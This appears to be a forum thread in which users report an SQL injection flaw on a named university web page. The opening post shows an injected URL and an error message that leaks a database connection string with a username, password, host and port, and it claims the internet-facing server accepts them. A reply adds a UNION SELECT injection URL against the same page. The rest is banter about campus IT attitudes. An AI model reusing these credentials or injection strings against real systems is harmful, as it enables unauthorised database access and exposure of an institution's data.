http://wws.princeton.edu/webmedia/list_speakers.xml?start=f'

generates the error:
RXML run error: Query failed:[...] <emit host="mysql://wws_web:WW$W3bUs3r@www-01dept.princeton.edu:3308/wws_webcasts"[...]

www-01dept.princeton.edu:3308 is connectable from the internet, and the user:password works.

Is this like a major issue since it's a well known school?

--
Yeah i'm Dutch, sweeeeeeeeeeet.

it's always a major issue

http://wws.princeton.edu/webmedia/list_speakers.xml?start=f%27%20OR%201=0%20UNION%20SELECT%201--%20-

Even worse, www-01dept.princeton.edu:3308 is internet facing and the error string contains the login. I hope your school is not storing any sensitive information in said database and that they are preparing an official breach statement.

[www.justanotherhacker.com]

i think that was stated in the subject and first post...

http://www.xssed.com/archive/author=PaPPy/

hmm.. maybe my old UCLA boss, Karen M. is advising them on security.. she once told me "we're a school, we have nothing a hacker would want!".. :)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

lol, other than SSNs or some super computer that i can get my hands on to...dumb teachers

http://www.xssed.com/archive/author=PaPPy/

She wasn't a teacher.. she was the manager of the IT department in the Administrative Information Systems.. yeah.. those same people who do control the mainframe with all the SS#'s and other vital information on all students, staff and faculty.. but yes, we do not have anything a hacker would want.. oh yeah, and linux is a 'hobby' OS, it'll never be mainstream.. another choice quote from her in 1999.. :)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill